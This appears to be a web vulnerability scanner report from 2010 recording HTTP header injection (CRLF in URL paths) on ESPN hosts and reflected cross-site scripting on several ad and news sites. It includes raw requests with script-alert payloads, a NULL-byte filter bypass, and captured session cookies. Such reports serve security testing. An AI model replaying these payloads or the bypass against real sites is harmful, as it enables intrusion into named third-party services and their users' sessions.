GET /pokerpickem/a807e%0d%0a898e11a593d/story HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 193 Content-Type: text/html; charset=iso-8859-1 Location: /pokerpickem/en/a807e 898e11a593d/story Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/a807e 898e11a593d/story">/pokerpickem/en/a807e 898e11a593d/story</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload db6fa%0d%0a57ddd8e895b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /db6fa%0d%0a57ddd8e895b HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 157 Content-Type: text/html; charset=iso-8859-1 Location: /en/db6fa 57ddd8e895b Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/db6fa 57ddd8e895b">/en/db6fa 57ddd8e895b</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 31be1%0d%0a5bb07d47379 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /31be1%0d%0a5bb07d47379/ HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 159 Content-Type: text/html; charset=iso-8859-1 Location: /en/31be1 5bb07d47379/ Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/31be1 5bb07d47379/">/en/31be1 5bb07d47379/</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 1babd%0d%0a818dc4039b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1babd%0d%0a818dc4039b8/conversation HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 183 Content-Type: text/html; charset=iso-8859-1 Location: /en/1babd 818dc4039b8/conversation Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/1babd 818dc4039b8/conversation">/en/1babd 818dc4039b8/conversation</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 6d6b6%0d%0a1e751f105f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6d6b6%0d%0a1e751f105f3/createOrUpdateEntry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 197 Content-Type: text/html; charset=iso-8859-1 Location: /en/6d6b6 1e751f105f3/createOrUpdateEntry Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/6d6b6 1e751f105f3/createOrUpdateEntry">/en/6d6b6 1e751f105f3/createOrUpdateEntry</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 60040%0d%0a06f626c9e72 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /60040%0d%0a06f626c9e72/entry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 169 Content-Type: text/html; charset=iso-8859-1 Location: /en/60040 06f626c9e72/entry Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/60040 06f626c9e72/entry">/en/60040 06f626c9e72/entry</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 63b5f%0d%0acf2b0e791bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /63b5f%0d%0acf2b0e791bb/entryStats HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 179 Content-Type: text/html; charset=iso-8859-1 Location: /en/63b5f cf2b0e791bb/entryStats Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/63b5f cf2b0e791bb/entryStats">/en/63b5f cf2b0e791bb/entryStats</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 7b78a%0d%0a54f670ab62 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7b78a%0d%0a54f670ab62/story HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Content-Length: 167 Content-Type: text/html; charset=iso-8859-1 Location: /en/7b78a 54f670ab62/story Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/7b78a 54f670ab62/story">/en/7b78a 54f670ab62/story</A>.<BODY></HTML>
5. Cross-site scripting (reflected)previous There are 150 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
5.1. http://altfarm.mediaplex.com/ad/fm/12760-79049-1577-0 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://altfarm.mediaplex.com
Path:
/ad/fm/12760-79049-1577-0
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64aee"><script>alert(1)</script>573b308cfb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/fm/12760-79049-1577-0?64aee"><script>alert(1)</script>573b308cfb8=1 HTTP/1.1 Host: altfarm.mediaplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: svid=OPT-OUT;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-cache Content-Type: text/html Content-Length: 302 Date: Sun, 07 Nov 2010 01:11:40 GMT
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e172c"><script>alert(1)</script>f7756b7702 was submitted in the REST URL parameter 1. This input was echoed as e172c"><script>alert(1)</script>f7756b7702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00e172c"><script>alert(1)</script>f7756b7702 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebbfb"><script>alert(1)</script>c9ded0707d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMebbfb"><script>alert(1)</script>c9ded0707d9/2010DM/146837268@x23 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:28 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f69"><script>alert(1)</script>08006aab004 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM22f69"><script>alert(1)</script>08006aab004/146837268@x23 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c0f"><script>alert(1)</script>7c6a11bd058 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/146837268@x23f5c0f"><script>alert(1)</script>7c6a11bd058 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:34 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de299"><script>alert(1)</script>d4f414c1327 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMde299"><script>alert(1)</script>d4f414c1327/DLX/11053880328@x95 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 331 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2fab"><script>alert(1)</script>3cd711156ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
